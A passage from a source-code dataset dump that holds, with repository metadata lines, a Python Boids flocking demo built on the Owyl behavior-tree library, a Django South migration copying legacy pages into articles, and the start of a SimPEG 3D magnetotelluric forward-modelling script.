}
            client.gopro.photos.save(store)
| mit | 5,475,434,421,845,267,000 | 25.792453 | 65 | 0.554616 | false | 3.704961 | false | false | false
eykd/owyl | examples/boids.py | 2 | 19512 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""boids -- Boids implementation using Owyl behavior trees.
This module provides example code using the L{owyl} library to
implement the Boids flocking algorithm.
Requirements
============
Note: this demo requires Pyglet, Rabbyt, cocos2d
- B{Pyglet}: U{http://pypi.python.org/pypi/pyglet}
- B{Rabbyt}: U{http://pypi.python.org/pypi/Rabbyt}
- B{cocos}: U{http://cocos2d.org/}
Intent
======
This example demonstrates the basic usage of Owyl, including:
- building and running a Behavior Tree, and
- developing custom behaviors.
Definitions
===========
- B{behavior}: Any unit of a Behavior Tree, as represented by a task
node, branch, or group of parallel behaviors.
- B{task node}: Any atomic Behavior Tree node.
- B{parent node}/B{parent task}: Any task node that has child nodes.
- B{branch}: A parent node and all its children.
- B{node decorator}: A parent node with only one child. Used to add
functionality to a child.
- B{leaf node}/B{leaf task}/B{leaf}: A task node that has no children.
Algorithm
=========
The basic Boids flocking algorithm was developed by Craig
Reynolds. For more information, see his page at
U{http://www.red3d.com/cwr/boids/}.
It's a very simple algorithm, with three basic behaviors:
- "B{Separation}: steer to avoid crowding local flockmates"
- "B{Alignment}: steer towards the average heading of local flockmates"
- "B{Cohesion}: steer to move toward the average position of local
flockmates"
I{(Definitions from C. Reynolds, linked above)}
This is actually so simple, we wouldn't really need a behavior tree
to model it, but it's a good place to start.
Just to spice things up, we've added some extra behavior: boids will
accelerate as they steer away from too-close flock mates, and they
will seek to match a global speed. This gives the flock more the
appearance of a school of fish, rather than a flight of sparrows, but
it will let us break out some slightly more advanced behaviors.
The boids will also seek after a fixed point (conveniently, the center
of the screen), so that we can observe their movement better.
Building the Tree
=================
See L{Boid.buildTree} below.
Core Behaviors
==============
The core behaviors are documented below in each task nodes'
docstring. They are:
- L{Boid.hasCloseNeighbors}: conditional to detect crowding
- L{Boid.accelerate}: accelerate at a given rate
- L{Boid.matchSpeed}: accelerate to match a given speed
- L{Boid.move}: move straight ahead at current speed
- L{Boid.seek}: seek a fixed goal position
- L{Boid.steerToMatchHeading}: match neighbors' average heading
- L{Boid.steerForSeparation}: steer away from close flockmates
- L{Boid.steerForCohesion}: steer toward average position of neighbors.
Helpers
=======
A number of other helper methods clutter up the namespace. Boid also
inherits from L{steering.Steerable<examples.steering.Steerable>},
which contains common steering helper methods which will be useful in
future examples.
Other Stuff
===========
Copyright 2008 David Eyk. All rights reserved.
$Author$\n
$Rev$\n
$Date$
@newfield blackboard: Blackboard data
"""
__author__ = "$Author$"[9:-2]
__revision__ = "$Rev$"[6:-2]
__date__ = "$Date$"[7:-2]
import os
import random
from math import radians, degrees, sin, cos, pi, atan2
pi_2 = pi*2.0
pi_1_2 = pi/2.0
pi_1_4 = pi/4.0
pi_3_4 = (pi*3)/4
### Optimized attribute getters for sprites..
from operator import attrgetter
getX = attrgetter('x')
getY = attrgetter('y')
getR = attrgetter('rotation')
### Memojito provides memoization (caching) services.
import memojito
### Pyglet provides graphics and resource management.
import pyglet
pyglet.resource.path = [os.path.dirname(os.path.abspath(__file__)),]
pyglet.resource.reindex()
## Cocos provides scene direction and composition
from cocos.director import director
from cocos.scene import Scene
from cocos.actions import FadeIn
from cocos.layer import ScrollableLayer, ScrollingManager
## Rabbyt provides collision detection
from rabbyt.collisions import collide_single
## Owyl provides the wisdom
from owyl import blackboard
import owyl
from steering import Steerable
class Boid(Steerable):
"""Implement a member of a flock.
Boid implements its leaf node behaviors as methods, using the
L{owyl.taskmethod} decorator. Leaf node behaviors may also be
implemented as unbound functions using the L{owyl.task}
decorators.
The boid's behavior tree is built in the L{Boid.buildTree} method,
below.
"""
_img = pyglet.resource.image('triangle_yellow.png')
_img.anchor_x = _img.width / 2
_img.anchor_y = _img.height / 2
boids = []
def __init__(self, blackboard):
super(Boid, self).__init__(self._img)
self.scale = 0.05
self.schedule(self.update)
self.bb = blackboard
self.boids.append(self)
self.opacity = 0
self.do(FadeIn(2))
self.speed = 200
self.bounding_radius = 5
self.bounding_radius_squared = 25
self.neighborhood_radius = 1000
self.personal_radius = 20
self.tree = self.buildTree()
def buildTree(self):
"""Build the behavior tree.
Building the behavior tree is as simple as nesting the
behavior constructor calls.
Building the Behavior Tree
==========================
We'll use a L{parallel<owyl.core.parallel>} parent node as
the root of our tree. Parallel is essentially a round-robin
scheduler. That is, it will run one step on each its children
sequentially, so that the children execute parallel to each
other. Parallel is useful as a root behavior when we want
multiple behaviors to run at the same time, as with Boids.
The first call to a task node constructor returns another
function. Calling I{that} function will return an iterable
generator. (This behavior is provided by the "@task..."
family of python decorators found in L{owyl.core}.)
Generally, you won't have to worry about this unless you're
writing new parent nodes, but keep it in mind.
Also note that keyword arguments can be provided at
construction time (call to task constructor) or at run-time
(call to visit). The C{blackboard} keyword argument to
C{visit} will be available to the entire tree. (This is also
why all nodes should accept C{**kwargs}-style keyword
arguments, and access.
Skipping down to the end of the tree definition, we see the
first use of
L{visit<owyl.core.visit>}. L{visit<owyl.core.visit>} provides
the external iterator interface to the tree. Technically,
it's an implementation of the Visitor pattern. It visits each
"node" of the behavior tree and iterates over it, descending
into children as determined by the logic of the parent
nodes. (In AI terminology, this is a depth-first search, but
with the search logic embedded in the tree.)
L{visit<owyl.core.visit>} is also used internally by several
parent behaviors, including L{parallel<owyl.core.parallel>},
L{limit<owyl.decorators.limit>}, and
L{repeatAlways<owyl.decorators.repeatAlways>} in order to
gain more control over its children.
L{limit<owyl.decorators.limit>}
===============================
The next parent node we see is
L{limit<owyl.decorators.limit>}. L{limit<owyl.decorators.limit>}
is a decorator node designed to limit how often its child is
run (given by the keyword argument C{limit_period} in
seconds). This is useful for limiting the execution of
expensive tasks.
In the example below, we're using
L{limit<owyl.decorators.limit>} to clear memoes once every
0.4 seconds. This implementation of Boids uses
L{memojito<examples.memojito>} to cache (or "memoize")
neighbor data for each Boid. Neighbor data is used by each of
the core behaviors, and is fairly expensive to
calculate. However, it's constantly changing, so adjusting
the limit_period will affect the behavior of the flock (and
the frame rate).
L{repeatAlways<owyl.decorators.repeatAlways>}
=============================================
We next see the L{repeatAlways<owyl.decorators.repeatAlways>}
decorator node. This does exactly as you might expect: it
takes a behavior that might only run once, and repeats it
perpetually, ignoring return values and always yielding None
(the special code for "I'm not done yet, give me another
chance to run").
L{sequence<owyl.decorators.sequence>}
=============================================
Runs a sequence of actions. If any action yields False,
then the rest of the sequence is not executed (the sequence
is halted). Otherwise, the next sequence item is run. In
this example, a boid accelerates away only if it is too close
to another boid.
Core Behaviors
==============
The core behaviors are documented below in each method's
docstring. They are:
- L{Boid.hasCloseNeighbors}: conditional to detect crowding
- L{Boid.accelerate}: accelerate at a given rate
- L{Boid.matchSpeed}: accelerate to match a given speed
- L{Boid.move}: move straight ahead at current speed
- L{Boid.seek}: seek a fixed goal position
- L{Boid.steerToMatchHeading}: match neighbors' average
heading
- L{Boid.steerForSeparation}: steer away from close
flockmates
- L{Boid.steerForCohesion}: steer toward average position of
neighbors.
"""
tree = owyl.parallel(
owyl.limit(
owyl.repeatAlways(self.clearMemoes(), debug=True),
limit_period=0.4),
### Velocity and Acceleration
#############################
owyl.repeatAlways(owyl.sequence(self.hasCloseNeighbors(),
self.accelerate(rate=-.01),
),
),
self.move(),
self.matchSpeed(match_speed=300, rate=.01),
### Steering
############
self.seek(goal=(0, 0), rate=5),
self.steerToMatchHeading(rate=2),
self.steerForSeparation(rate=5),
self.steerForCohesion(rate=2),
policy=owyl.PARALLEL_SUCCESS.REQUIRE_ALL
)
return owyl.visit(tree, blackboard=self.bb)
@owyl.taskmethod
def hasCloseNeighbors(self, **kwargs):
"""Check to see if we have close neighbors.
"""
yield bool(self.closest_neighbors)
@owyl.taskmethod
def accelerate(self, **kwargs):
"""accelerate
@keyword rate: The rate of acceleration (+ or -)
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
dt = bb['dt']
self.speed = max(self.speed + rate * dt, 0)
yield True
@owyl.taskmethod
def matchSpeed(self, **kwargs):
"""Accelerate to match the given speed.
@keyword blackboard: A shared blackboard.
@keyword match_speed: The speed to match.
@keyword rate: The rate of acceleration.
"""
bb = kwargs['blackboard']
ms = kwargs['match_speed']
rate = kwargs['rate']
while True:
if self.speed == ms:
yield None
dt = bb['dt']
dv_size = ms - self.speed
dv = dv_size * rate * dt
self.speed += dv
yield None
@owyl.taskmethod
def move(self, **kwargs):
"""Move the actor forward perpetually.
@keyword blackboard: shared blackboard
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
while True:
dt = bb['dt']
r = radians(getR(self)) # rotation
s = dt * self.speed
self.x += sin(r) * s
self.y += cos(r) * s
yield None
@owyl.taskmethod
def seek(self, **kwargs):
"""Perpetually seek a goal position.
@keyword rate: steering rate
@keyword blackboard: shared blackboard
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
gx, gy = kwargs.get('goal', (0, 0))
while True:
dt = bb['dt']
dx = gx-self.x
dy = gy-self.y
seek_heading = self.getFacing(dx, dy)
my_heading = radians(self.rotation)
rsize = degrees(self.findRotationDelta(my_heading, seek_heading))
rchange = rsize * rate * dt
self.rotation += rchange
yield None
@owyl.taskmethod
def steerToMatchHeading(self, **kwargs):
"""Perpetually steer to match actor's heading to neighbors.
@keyword blackboard: shared blackboard
@keyword rate: steering rate
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
while True:
dt = bb['dt'] or 0.01
n_heading = radians(self.findAverageHeading(*self.neighbors))
if n_heading is None:
yield None
continue
my_heading = radians(self.rotation)
rsize = degrees(self.findRotationDelta(my_heading, n_heading))
# Factor in our turning rate and elapsed time.
rchange = rsize * rate * dt
self.rotation += rchange
yield None
@owyl.taskmethod
def steerForSeparation(self, **kwargs):
"""Steer to maintain distance between self and neighbors.
@keyword blackboard: shared blackboard
@keyword rate: steering rate
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
while True:
cn_x, cn_y = self.findAveragePosition(*self.closest_neighbors)
dt = bb['dt']
dx = self.x-cn_x
dy = self.y-cn_y
heading_away_from_neighbors = self.getFacing(dx, dy)
flee_heading = heading_away_from_neighbors
my_heading = radians(self.rotation)
rsize = degrees(self.findRotationDelta(my_heading, flee_heading))
# Factor in our turning rate and elapsed time.
rchange = rsize * rate * dt
self.rotation += rchange
yield None
@owyl.taskmethod
def steerForCohesion(self, **kwargs):
"""Steer toward the average position of neighbors.
@keyword blackboard: shared blackboard
@keyword rate: steering rate
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
while True:
neighbors = self.neighbors
np_x, np_y = self.findAveragePosition(*neighbors)
dt = bb['dt']
dx = np_x-self.x
dy = np_y-self.y
seek_heading = self.getFacing(dx, dy)
my_heading = radians(self.rotation)
# Find the rotation delta
rsize = degrees(self.findRotationDelta(my_heading, seek_heading))
# Factor in our turning rate and elapsed time.
rchange = rsize * rate * dt
self.rotation += rchange
yield None
def canSee(self, other):
"""Return True if I can see the other boid.
@param other: Another Boid or Sprite.
@type other: L{Boid} or C{Sprite}.
"""
dx = self.x - other.x
dy = self.y - other.y
return abs(self.getFacing(dx, dy)) < pi_1_2
@memojito.memoizedproperty
def others(self):
"""Find other boids that I can see.
@rtype: C{list} of L{Boid}s.
"""
return [b for b in self.boids if b is not self and self.canSee(b)]
@property
def neighbors(self):
"""Find the other boids in my neighborhood.
@rtype: C{list} of L{Boid}s.
"""
hood = (self.x, self.y, self.neighborhood_radius) # neighborhood
n = collide_single(hood, self.others)
return n
@property
def closest_neighbors(self):
"""Find the average position of the closest neighbors.
@rtype: C{tuple} of C{(x, y)}.
"""
hood = (self.x, self.y, self.personal_radius)
n = collide_single(hood, self.others)
return n
def findAveragePosition(self, *boids):
"""Return the average position of the given boids.
@rtype: C{tuple} of C{(x, y)}.
"""
if not boids:
return (0, 0)
num_n = float(len(boids)) or 1
avg_x = sum((getX(n) for n in boids))/num_n
avg_y = sum((getY(n) for n in boids))/num_n
return avg_x, avg_y
def findAverageHeading(self, *boids):
"""Return the average heading of the given boids.
@rtype: C{float} rotation in degrees.
"""
if not boids:
return 0.0
return sum((getR(b) for b in boids))/len(boids)
@owyl.taskmethod
def clearMemoes(self, **kwargs):
"""Clear memoizations.
"""
self.clear()
yield True
@memojito.clearbefore
def clear(self):
"""Clear memoizations.
"""
pass
def update(self, dt):
"""Update this Boid's behavior tree.
This gets scheduled in L{Boid.__init__}.
@param dt: Change in time since last update.
@type dt: C{float} seconds.
"""
self.bb['dt'] = dt
self.tree.next()
class BoidLayer(ScrollableLayer):
"""Where the boids fly.
"""
is_event_handler = True
def __init__(self, how_many):
super(BoidLayer, self).__init__()
self.how_many = how_many
self.manager = ScrollingManager()
self.manager.add(self)
self.active = None
self.blackboard = blackboard.Blackboard("boids")
self.boids = None
def makeBoids(self):
boids = []
for x in xrange(int(self.how_many)):
boid = Boid(self.blackboard)
boid.position = (random.randint(0, 200),
random.randint(0, 200))
boid.rotation = random.randint(1, 360)
self.add(boid)
boids.append(boid)
return boids
def on_enter(self):
"""Code to run when the Layer enters the scene.
"""
super(BoidLayer, self).on_enter()
self.boids = self.makeBoids()
# Place flock in the center of the window
self.manager.set_focus(-512, -384)
if __name__ == "__main__":
import sys
if len(sys.argv) == 2:
how_many = int(sys.argv[1])
else:
how_many = 50
director.init(resizable=True, caption="Owyl Behavior Tree Demo: Boids",
width=1024, height=768)
s = Scene(BoidLayer(how_many))
director.run(s)
| bsd-3-clause | -5,427,581,079,136,333,000 | 30.675325 | 77 | 0.604141 | false | 3.850799 | false | false | false |
urlist/devcharm | articles/migrations/0002_import_previous_articles.py | 1 | 18116 | # -*- coding: utf-8 -*-
from django.db.utils import IntegrityError, ProgrammingError
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models, connection
from articles.models import Article
class Migration(DataMigration):
def get_full_raw_content(self, page):
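        """Reassemble the legacy page's full markdown source (title, punchline, description, body)."""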
return u'# {}\n\n> {}\n\n{}\n\n{}'.format(page.title, page.punchline, page.description, page.raw_content)
def forwards(self, orm):
if not 'pages_page' in connection.introspection.table_names():
# The table does not exists, which means that we're running on a fresh installation, so we can skip
# the whole migration
return
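        # Copy every legacy Page (plus its tags, revisions, kudos and views)
        # into the new Article models; author user id 308 is skipped here
        # (presumably a special/system account in the legacy data).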
for page in orm['pages.page'].objects.exclude(author__user_id=308):
defaults = {'created_at': page.created_at,
'deleted_at': page.deleted_at,
'hide': page.hide,
'is_wiki': page.is_wiki,
'published_at': page.published_at,
'raw_content': self.get_full_raw_content(page),
'slug': page.slug.lower(),
'submitted_at': page.submitted_at,
'title': page.title,
'updated_at': page.updated_at,
'views_count': page.views,
'received_kudos_count': page.karma,
'revisions_count': page.pagerevision_set.count(),
# Special treatment required
'author_id': page.author.user_id, }
rendered_content = Article.process_raw_content(defaults['raw_content'])
defaults['rendered_html'] = rendered_content['rendered_html']
defaults['description'] = rendered_content['description']
defaults['punchline'] = rendered_content['punchline']
a, created = orm['articles.article'].objects.get_or_create(pk=page.pk, defaults=defaults)
a.tags.clear()
for tag in page.tags.all():
apply_tag, tag_created = orm['tags.tag'].objects.get_or_create(pk=tag.pk,
defaults={'title': tag.name})
a.tags.add(apply_tag)
a.revision_set.all().delete()
for rev in page.pagerevision_set.all():
rev_values = {
'author': rev.author.user,
'created_at': rev.created_at,
'raw_content': self.get_full_raw_content(rev),
'title': rev.title,
}
rendered_content = Article.process_raw_content(defaults['raw_content'])
rev_values['description'] = rendered_content['description']
rev_values['punchline'] = rendered_content['punchline']
a.revision_set.create(pk=rev.pk, **rev_values)
a.kudos_received.all().delete()
for kudos in page.pagekarma_set.all():
kudos_values = {
'user': kudos.user,
'session_id': kudos.session_id,
'timestamp': kudos.timestamp,
}
a.kudos_received.create(**kudos_values)
a.articleview_set.all().delete()
for v in page.pageview_set.all():
view_values = {
'user': v.user,
'session_id': v.session_id,
'timestamp': v.timestamp,
}
a.articleview_set.create(**view_values)
def backwards(self, orm):
pass
models = {
u'articles.article': {
'Meta': {'object_name': 'Article'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'comments_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'editors_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'hide': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'published_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'received_kudos_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'rendered_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'revisions_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'submitted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [],
{'blank': 'True', 'related_name': "'tagged_article_set'", 'null': 'True', 'symmetrical': 'False',
'to': u"orm['tags.Tag']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'views_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'articles.articlegroup': {
'Meta': {'object_name': 'ArticleGroup'},
'articles': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'to': u"orm['articles.Article']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publish_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'target_block': (
'django.db.models.fields.CharField', [], {'default': "'editors_picks'", 'max_length': '255'})
},
u'articles.articleview': {
'Meta': {'object_name': 'ArticleView'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['articles.Article']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'blank': 'True', 'related_name': "'viewed_pages'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'articles.kudos': {
'Meta': {'unique_together': "[('article', 'session_id'), ('article', 'user')]", 'object_name': 'Kudos'},
'article': ('django.db.models.fields.related.ForeignKey', [],
{'related_name': "'kudos_received'", 'to': u"orm['articles.Article']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'blank': 'True', 'related_name': "'kudos_given'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'articles.revision': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Revision'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['articles.Article']"}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [],
{'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')",
'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': (
'django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True',
'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True',
'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)",
'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'tags.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'title': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'pages.page': {
'Meta': {'object_name': 'Page'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.PageAuthor']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'hide': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'karma': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'published_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'submitted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'to': u"orm['pages.PageTag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'pages.pageauthor': {
'Meta': {'object_name': 'PageAuthor'},
'bio': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'karma': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'user': (
'django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'})
},
u'pages.pagetag': {
'Meta': {'object_name': 'PageTag'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'pages.pageview': {
'Meta': {'ordering': "['-timestamp']", 'object_name': 'PageView'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.Page']"}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
},
u'pages.pagekarma': {
'Meta': {'ordering': "['-timestamp']", 'object_name': 'PageKarma'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.Page']"}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
},
u'pages.pagerevision': {
'Meta': {'object_name': 'PageRevision'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.PageAuthor']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.Page']"}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
}
complete_apps = ['articles']
symmetrical = True
| gpl-3.0 | -6,591,887,817,401,861,000 | 66.345725 | 120 | 0.525834 | false | 3.834074 | false | false | false |
simpeg/simpeg | examples/08-nsem/plot_foward_MTTipper3D.py | 1 | 3807 | """
MT: 3D: Forward
===============
Forward model 3D MT data.
Test script to use SimPEG.NSEM platform to forward model
impedance and tipper synthetic data.
"""
import SimPEG as simpeg
from SimPEG.EM import NSEM
import numpy as np
import matplotlib.pyplot as plt
try:
from pymatsolver import Pardiso as Solver
except:
from SimPEG import Solver
def run(plotIt=True):
"""
MT: 3D: Forward
===============
Forward model 3D MT data.
"""
# Make a mesh
M = simpeg.Mesh.TensorMesh(
[
[(100, 9, -1.5), (100., 13), (100, 9, 1.5)],
[(100, 9, -1.5), (100., 13), (100, 9, 1.5)],
[(50, 10, -1.6), (50., 10), (50, 6, 2)]
], x0=['C', 'C', -14926.8217]
)
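    # Horizontal: 13 core 100 m cells padded by 9 geometrically expanding cells
    # on each side; vertical: 10 core 50 m cells with expanding padding below
    # (10 cells) and above (6 cells), centered in x and y.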
# Setup the model
conds = [1,1e-2]
sig = simpeg.Utils.ModelBuilder.defineBlock(
M.gridCC, [-100, -100, -350], [100, 100, -150], conds
)
sig[M.gridCC[:, 2] > 0] = 1e-8
sig[M.gridCC[:, 2] < -1000] = 1e-1
sigBG = np.zeros(M.nC) + conds[1]
sigBG[M.gridCC[:, 2] > 0] = 1e-8
if plotIt:
collect_obj, line_obj = M.plotSlice(np.log10(sig), grid=True, normal='X')
color_bar = plt.colorbar(collect_obj)
    # Set up the survey object
# Receiver locations
rx_x, rx_y = np.meshgrid(np.arange(-600, 601, 100), np.arange(-600, 601, 100))
rx_loc = np.hstack((simpeg.Utils.mkvc(rx_x, 2), simpeg.Utils.mkvc(rx_y, 2), np.zeros((np.prod(rx_x.shape), 1))))
# Make a receiver list
rxList = []
for rx_orientation in ['xx', 'xy', 'yx', 'yy']:
rxList.append(NSEM.Rx.Point_impedance3D(rx_loc, rx_orientation, 'real'))
rxList.append(NSEM.Rx.Point_impedance3D(rx_loc, rx_orientation, 'imag'))
for rx_orientation in ['zx', 'zy']:
rxList.append(NSEM.Rx.Point_tipper3D(rx_loc, rx_orientation, 'real'))
rxList.append(NSEM.Rx.Point_tipper3D(rx_loc, rx_orientation, 'imag'))
# Source list
srcList = [
